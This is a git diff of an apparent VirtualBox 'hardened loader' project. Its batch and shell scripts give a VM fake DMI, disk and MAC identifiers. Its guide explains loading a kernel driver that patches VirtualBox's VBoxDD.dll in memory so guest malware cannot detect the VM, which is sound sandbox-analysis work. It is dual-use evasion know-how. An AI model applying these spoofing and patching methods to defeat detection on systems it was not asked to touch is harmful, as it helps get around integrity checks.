%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13"
@@ -64,10 +67,8 @@ set vmscfgdir=D:\Virtual\VBOX\Settings\
cd /d %vmscfgdir%
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin"
-
+%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%vgabios386.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios386.bin"
@pause
diff --git a/Binary/data/hidevm_efiahci.cmd b/Binary/data/hidevm_efiahci.cmd
index 0b6d443..52af5f3 100644
--- a/Binary/data/hidevm_efiahci.cmd
+++ b/Binary/data/hidevm_efiahci.cmd
@@ -1,6 +1,7 @@
rem @echo off
rem EFI/AHCI mode
+rem This script is for use with VBoxHardenedLoader v2+
rem vboxman is the full path to the vboxmanage executable
rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
@@ -8,6 +9,8 @@ rem vmscfgdir is the path to directory that keeps vbox custom configuration data
set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
set vmscfgdir=D:\Virtual\VBOX\Settings\
+%vboxman% setextradata "%1" "VBoxInternal/CPUM/EnableHVP" 0
+
%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc."
%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13"
@@ -63,7 +66,8 @@ set vmscfgdir=D:\Virtual\VBOX\Settings\
cd /d %vmscfgdir%
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%vgabios386.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/EfiRom" "%vmscfgdir%efi_amd64_fixed_6.1.2.fd"
@pause
diff --git a/Binary/data/hidevm_efiide.cmd b/Binary/data/hidevm_efiide.cmd
index 78ef4d8..ce8ff6b 100644
--- a/Binary/data/hidevm_efiide.cmd
+++ b/Binary/data/hidevm_efiide.cmd
@@ -1,6 +1,7 @@
rem @echo off
rem EFI/IDE mode
+rem This script is for use with VBoxHardenedLoader v2+
rem vboxman is the full path to the vboxmanage executable
rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
@@ -8,6 +9,8 @@ rem vmscfgdir is the path to directory that keeps vbox custom configuration data
set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
set vmscfgdir=D:\Virtual\VBOX\Settings\
+%vboxman% setextradata "%1" "VBoxInternal/CPUM/EnableHVP" 0
+
%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc."
%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13"
@@ -62,7 +65,7 @@ set vmscfgdir=D:\Virtual\VBOX\Settings\
cd /d %vmscfgdir%
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
-
+%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%vgabios386.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/EfiRom" "%vmscfgdir%efi_amd64_fixed_6.1.2.fd"
@pause
diff --git a/Binary/data/hidevm_ide.cmd b/Binary/data/hidevm_ide.cmd
index 1682427..438b9db 100644
--- a/Binary/data/hidevm_ide.cmd
+++ b/Binary/data/hidevm_ide.cmd
@@ -1,6 +1,7 @@
rem @echo off
rem BIOS/IDE mode
+rem This script is for use with VBoxHardenedLoader v2+
rem vboxman is the full path to the vboxmanage executable
rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
@@ -8,6 +9,8 @@ rem vmscfgdir is the path to directory that keeps vbox custom configuration data
set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
set vmscfgdir=D:\Virtual\VBOX\Settings\
+%vboxman% setextradata "%1" "VBoxInternal/CPUM/EnableHVP" 0
+
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13"
@@ -62,9 +65,8 @@ set vmscfgdir=D:\Virtual\VBOX\Settings\
cd /d %vmscfgdir%
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%vgabios386.bin"
+%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios386.bin"
@pause
diff --git a/Binary/data/linux/hidevm_bios.sh b/Binary/data/linux/hidevm_bios.sh
new file mode 100644
index 0000000..e84a7d4
--- /dev/null
+++ b/Binary/data/linux/hidevm_bios.sh
@@ -0,0 +1,61 @@
+#! /bin/sh
+
+vboxmanage setextradata "$1" "VBoxInternal/CPUM/EnableHVP" 0
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "N1MET31W (1.16 )"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "03/10/2017"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "3"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "91"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "3"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "91"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "20HQZ2YHUS"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "ThinkPad X1 Carbon 5th"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "PF0N9BA2"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "4C3C615B-D626-B211-A85C-C9A2E7368262"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "20HQZ2YHUS"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "SDK0J40697 WIN"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "L1HF6BG000Y"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "0123456789ABCDEF"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 6
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "PF0N9BA2"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "0123456789ABCDEF"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 3.00.00"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1E"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "THNSF5256GPUK TOSHIBA"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "51025KLA"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "96IS10F4T4UT"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "HL-DT-ST DVDRAM GUE2P"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "AS01"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "KRFG74G5310"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVDRAM GUE2P"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "AS01"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "/home/user/vm/vgabios386.bin"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "/home/user/vm/pcbios386.bin"
+
+vboxmanage modifyvm "$1" --paravirtprovider legacy
+vboxmanage modifyvm "$1" --chipset ich9
+vboxmanage modifyvm "$1" --macaddress1 2B49443BC482
+vboxmanage modifyvm "$1" --hwvirtex on
+vboxmanage modifyvm "$1" --vtxvpid on
+vboxmanage modifyvm "$1" --vtxux on
+vboxmanage modifyvm "$1" --apic on
+vboxmanage modifyvm "$1" --pae on
+vboxmanage modifyvm "$1" --longmode on
+vboxmanage modifyvm "$1" --hpet on
+vboxmanage modifyvm "$1" --nestedpaging on
+vboxmanage modifyvm "$1" --largepages on
\ No newline at end of file
diff --git a/Binary/data/linux/hidevm_efi.sh b/Binary/data/linux/hidevm_efi.sh
new file mode 100644
index 0000000..c8c3ebd
--- /dev/null
+++ b/Binary/data/linux/hidevm_efi.sh
@@ -0,0 +1,60 @@
+#! /bin/sh
+
+vboxmanage setextradata "$1" "VBoxInternal/CPUM/EnableHVP" 0
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "N1MET31W (1.16 )"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "03/10/2017"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMajor" "3"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMinor" "91"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMajor" "3"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMinor" "91"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "20HQZ2YHUS"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "ThinkPad X1 Carbon 5th"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSerial" "PF0N9BA2"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSKU" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemFamily" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemUuid" "4C3C615B-D626-B211-A85C-C9A2E7368262"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "20HQZ2YHUS"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVersion" "SDK0J40697 WIN"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardSerial" "L1HF6BG000Y"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardAssetTag" "0123456789ABCDEF"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardLocInChass" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardBoardType" 10
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisType" 6
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVersion" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisSerial" "PF0N9BA2"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisAssetTag" "0123456789ABCDEF"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxVer" "Extended version info: 3.00.00"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxRev" "Extended revision info: 1E"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "THNSF5256GPUK TOSHIBA"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "51025KLA"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "96IS10F4T4UT"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "HL-DT-ST DVDRAM GUE2P"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "AS01"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "KRFG74G5310"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVDRAM GUE2P"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "AS01"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/EfiRom" "/home/user/vm/VBoxEFI64.fd"
+
+vboxmanage modifyvm "$1" --paravirtprovider legacy
+vboxmanage modifyvm "$1" --chipset ich9
+vboxmanage modifyvm "$1" --macaddress1 2B49443BC482
+vboxmanage modifyvm "$1" --hwvirtex on
+vboxmanage modifyvm "$1" --vtxvpid on
+vboxmanage modifyvm "$1" --vtxux on
+vboxmanage modifyvm "$1" --apic on
+vboxmanage modifyvm "$1" --pae on
+vboxmanage modifyvm "$1" --longmode on
+vboxmanage modifyvm "$1" --hpet on
+vboxmanage modifyvm "$1" --nestedpaging on
+vboxmanage modifyvm "$1" --largepages on
\ No newline at end of file
diff --git a/Binary/data/linux/readme.txt b/Binary/data/linux/readme.txt
new file mode 100644
index 0000000..003a4d7
--- /dev/null
+++ b/Binary/data/linux/readme.txt
@@ -0,0 +1,5 @@
+These are shell scripts examples to use on Linux.
+Both examples are for AHCI disk controller.
+
+Note that you must edit these scripts before usage.
+Replace all "/home/user/vm/" to the paths on your computer.
\ No newline at end of file
diff --git a/Binary/data/pcbios.bin b/Binary/data/pcbios386.bin
similarity index 55%
rename from Binary/data/pcbios.bin
rename to Binary/data/pcbios386.bin
index 1f00a87..da6a1b6 100644
Binary files a/Binary/data/pcbios.bin and b/Binary/data/pcbios386.bin differ
diff --git a/Binary/data/pxerom.bin b/Binary/data/pxerom.bin
deleted file mode 100644
index 15cb3d5..0000000
Binary files a/Binary/data/pxerom.bin and /dev/null differ
diff --git a/Binary/data/videorom.bin b/Binary/data/vgabios386.bin
similarity index 53%
rename from Binary/data/videorom.bin
rename to Binary/data/vgabios386.bin
index c39d8fc..8c0e1de 100644
Binary files a/Binary/data/videorom.bin and b/Binary/data/vgabios386.bin differ
diff --git a/Binary/help/10_script.png b/Binary/help/10_script.png
index 1f9f9e7..e11bd9d 100644
Binary files a/Binary/help/10_script.png and b/Binary/help/10_script.png differ
diff --git a/Binary/help/11_loader_before.png b/Binary/help/11_loader_before.png
new file mode 100644
index 0000000..1fa44fb
Binary files /dev/null and b/Binary/help/11_loader_before.png differ
diff --git a/Binary/help/11_tdl_tsugumi_before.png b/Binary/help/11_tdl_tsugumi_before.png
deleted file mode 100644
index 4b4d96c..0000000
Binary files a/Binary/help/11_tdl_tsugumi_before.png and /dev/null differ
diff --git a/Binary/help/12_loader_after.png b/Binary/help/12_loader_after.png
new file mode 100644
index 0000000..2288a53
Binary files /dev/null and b/Binary/help/12_loader_after.png differ
diff --git a/Binary/help/12_tdl_tsugumi_after.png b/Binary/help/12_tdl_tsugumi_after.png
deleted file mode 100644
index d8aee75..0000000
Binary files a/Binary/help/12_tdl_tsugumi_after.png and /dev/null differ
diff --git a/Binary/help/13_loader_help.png b/Binary/help/13_loader_help.png
deleted file mode 100644
index 0ec2c44..0000000
Binary files a/Binary/help/13_loader_help.png and /dev/null differ
diff --git a/Binary/help/14_loader_start.png b/Binary/help/14_loader_start.png
deleted file mode 100644
index e7145c8..0000000
Binary files a/Binary/help/14_loader_start.png and /dev/null differ
diff --git a/Binary/help/15_loader_signed.png b/Binary/help/15_loader_signed.png
deleted file mode 100644
index eb04064..0000000
Binary files a/Binary/help/15_loader_signed.png and /dev/null differ
diff --git a/Binary/help/1_install.png b/Binary/help/1_install.png
index edcc9a8..037a97b 100644
Binary files a/Binary/help/1_install.png and b/Binary/help/1_install.png differ
diff --git a/Binary/help/2_createvm.png b/Binary/help/2_createvm.png
index 1c8f56a..2bd6983 100644
Binary files a/Binary/help/2_createvm.png and b/Binary/help/2_createvm.png differ
diff --git a/Binary/help/3_createhdd.png b/Binary/help/3_createhdd.png
index 30f196a..07812a8 100644
Binary files a/Binary/help/3_createhdd.png and b/Binary/help/3_createhdd.png differ
diff --git a/Binary/help/4_settings_mb.png b/Binary/help/4_settings_mb.png
index 5364b71..a439402 100644
Binary files a/Binary/help/4_settings_mb.png and b/Binary/help/4_settings_mb.png differ
diff --git a/Binary/help/5_settings_cpu.png b/Binary/help/5_settings_cpu.png
index 2fe2f4c..c8406ea 100644
Binary files a/Binary/help/5_settings_cpu.png and b/Binary/help/5_settings_cpu.png differ
diff --git a/Binary/help/6_settings_accel.png b/Binary/help/6_settings_accel.png
index 393865a..d1ac308 100644
Binary files a/Binary/help/6_settings_accel.png and b/Binary/help/6_settings_accel.png differ
diff --git a/Binary/help/7_display.png b/Binary/help/7_display.png
index 13f1c46..6bdbfb9 100644
Binary files a/Binary/help/7_display.png and b/Binary/help/7_display.png differ
diff --git a/Binary/help/7_display2.png b/Binary/help/7_display2.png
new file mode 100644
index 0000000..0d223e9
Binary files /dev/null and b/Binary/help/7_display2.png differ
diff --git a/Binary/help/8_storage.png b/Binary/help/8_storage.png
index e59a9b9..6fc4abb 100644
Binary files a/Binary/help/8_storage.png and b/Binary/help/8_storage.png differ
diff --git a/Binary/help/9_network.png b/Binary/help/9_network.png
index b3775fc..f1a9a62 100644
Binary files a/Binary/help/9_network.png and b/Binary/help/9_network.png differ
diff --git a/Binary/help/vbox6_efibug_workaround.png b/Binary/help/vbox6_efibug_workaround.png
deleted file mode 100644
index 60b0c69..0000000
Binary files a/Binary/help/vbox6_efibug_workaround.png and /dev/null differ
diff --git a/Binary/install.md b/Binary/howto.md
similarity index 66%
rename from Binary/install.md
rename to Binary/howto.md
index 00a5c0c..aee29cc 100644
--- a/Binary/install.md
+++ b/Binary/howto.md
@@ -1,6 +1,8 @@
# Installation guide
-Step by step guide for VirtualBox x64 Hardened (5.1.16+) VM detection mitigation configuring.
+Step by step guide for VM detection mitigation configuring using VirtualBox x64 Hardened loader v2.
+
+Note: Minimum required VirtualBox version is 6.1.2
Contents:
@@ -8,7 +10,7 @@ Contents:
* Creating VM with required settings
* Using batch script to apply fake VM system information
* Loading monitoring driver for load-in-memory VM dll patch
- * Using VirtualBox loader to manage monitoring driver behavior
+ * Stopping monitoring driver
* Warning: VirtualBox Additions
* Appendix A: Using EFI VM
* Appendix B: Uninstalling VirtualBox loader
@@ -26,19 +28,19 @@ Contents:
### Step 2. Creating VM with required setting
-In this example we are installing and configuring VirtualBox on x64 notebook with 6Gb of RAM and 4x Intel Core i7 Haswell CPU running full patch Windows 8.1.
+In this example we are installing and configuring VirtualBox on x64 PC running full patch Windows 8.1.
Create a new virtual machine (in this example it will be named "vm0") and configure it in the following way:
-Note: 512 Mb is not requirement, you can adjust or lower this value as you want, but keep in mind - some lame malware attempt to detect VM by available physical memory size, and if its too low - use it as VM detection flag.
+Note: 2048 Mb is not requirement, you can adjust or lower this value as you want, but keep in mind - some lame malware attempt to detect VM by available physical memory size, and if its too low - use it as VM detection flag.
Setup Virtual disk
-Note: 64 Gb is not requirement however yet again some lame malware attempt to detect VM by hard disk size, so give it reasonable size.
+Note: 32 Gb is not requirement and just used as example, however yet again some lame malware attempt to detect VM by hard disk size, so give it reasonable size (>32 Gb).
After VM (vm0 is our case) created, open it setting and do some changes.
@@ -128,32 +130,21 @@ Do not run any VM, as it is not ready yet.
Close VirtualBox if it opened.
-Open elevated command line prompt. Run cmd.exe as admin and switch current directory to C:\VBoxLdr (or where you saved Binary folder). Use tdl.exe to load monitoring driver, type as below on screenshot:
+Open elevated command line prompt. Run cmd.exe as admin and switch current directory to C:\VBoxLdr (or where you saved Binary folder). Use loader.exe to start monitoring, type as below on screenshot:
-
+
Upon successful execution you will see something like that:
-
+
-Done, monitoring driver loaded. Now we need to properly configure it. Do not start VirtualBox as we didn't finished yet.
+Done, monitoring driver loaded and configured. You will have to repeat this (and only) step each time you boot Windows, because monitoring driver will be unloaded automatically upon system shutdown/reboot.
-### Step 5. Using VirtualBox loader to manage monitoring driver behavior
+### Step 5. Stopping monitoring driver.
Close VirtualBox if it opened.
-We need to give our monitoring driver proper data to work with. Loader.exe is the application that does this. Running it with /? will give you small help on it usage.
-
-
-So we will just run it without parameters. In same elevated command line prompt type loader and press Enter, upon succesful execution you will see something like that:
-
-
-
-That's is all. Now you can start VirtualBox and load prepared VM.
-
-If you want to stop monitoring driver, open elevated command line prompt, navigate to VBoxLdr folder and run loader with /s switch, e.g. loader.exe /s. To reenable monitoring just re-run loader without parameters elevated (as admin).
-Monitoring driver will be unloaded at Windows shutdown or reboot. To start it again repeat step 4 (step 5 repeat is only needed when you decided to upgrade VirtualBox without uninstalling previous version and rebooting).
-
+Open elevated command line prompt, navigate to VBoxLdr folder and run loader with /s switch, e.g. loader.exe /s. To reenable monitoring just re-run loader without parameters elevated (as admin). Monitoring driver will be unloaded at Windows shutdown or reboot. To start it again repeat step 4.
## Warning: VirtualBox Additions
@@ -161,40 +152,24 @@ Do not install VirtualBox Additions! This will ruin everything and there is NO w
### Appendix A: Using EFI VM
-There are two ways to set your patched/custom EFI ROM for EFI VM.
-
-##### 1. Replace VBoxEFI64.fd with patched
-During Step 3.
-
-* Make backup copy of original `VBoxEFI64.fd` in VirtualBox directory somewhere;
-* Replace `VBoxEFI64.fd` in VirtualBox directory with it patched version from VBoxLdr\data directory. Select proper version of file and then rename it to `VBoxEFI64.fd` (e.g. you have installed 5.1.18 then select `VBoxEFI64_5.1.18.fd`);
-* Use hidevm_efiahci (AHCI controller mode) or hidevm_efiide (IDE controller mode) for your EFI VM.
-
-##### 2. Use vboxmanage setextradata
-It is the simple way, without any file replacing:
-* Configure VM to use alternative EFI ROM with help of VBoxManage.
+Configure VM to use alternative EFI ROM with help of VBoxManage.
*vboxmanage setextradata vmname "VBoxInternal/Devices/efi/0/Config/EfiRom" full_path_to_your_patched_efirom*
-e.g. *vboxmanage setextradata vm01 "VBoxInternal/Devices/efi/0/Config/EfiRom" C:\VM\PinkiPie.fd*
+For example, if you are using VirtualBox 6.1.2 then
+
+*vboxmanage setextradata vm01 "VBoxInternal/Devices/efi/0/Config/EfiRom" C:\VBoxLdr\data\efi_amd64_fixed_6.1.2*
To automate this you can add the following string to EFI vm configuration scripts
+
*%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/EfiRom" full_path_to_your_patched_efirom*
-Note that some VirtualBox versions might not support this.
+Note: configuration scripts hidevm_efiahci/hidevm_efiide already has this setting set.
### Appendix B: Uninstalling VirtualBox loader
-If monitoring driver loaded - reboot Windows. Delete VBoxLdr folder. Open regedit and delete keys
-
->HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tsugumi
->
->HKEY_LOCAL_MACHINE\SOFTWARE\Tsugumi
-
-if present.
-
-If you used patched EFI module then restore `VBoxEFI64.fd` file from backup otherwise VirtualBox will be unable to work with EFI VM's.
+If monitoring driver loaded - reboot Windows. Delete VBoxLdr folder.
### Appendix C: Updating VirtualBox
-Scenario: you decided update VirtualBox without clean reinstall and rebooting your PC. Will the loader work with new version? Yes it will, but you need re-run loader.exe in elevated command prompt to update patch information for new version of VirtualBox dynamic link library VBoxDD.dll. Basically you need to repeat Step 5.
+Scenario: you decided update VirtualBox without clean reinstall and rebooting your PC. Will the loader work with new version? Yes it will, but you have to re-run loader.exe in elevated command prompt to update patch information for new version of VirtualBox dynamic link library VBoxDD.dll. Basically you need to repeat Step 4.
diff --git a/Binary/install.cmd b/Binary/install.cmd
deleted file mode 100644
index 338a640..0000000
--- a/Binary/install.cmd
+++ /dev/null
@@ -1,9 +0,0 @@
-REM Append full patch to tdl.exe/tsugumi.sys and run this batch file elevated
-@echo off
-echo Run TDL (tdl.exe tsugumi.sys)
-pause
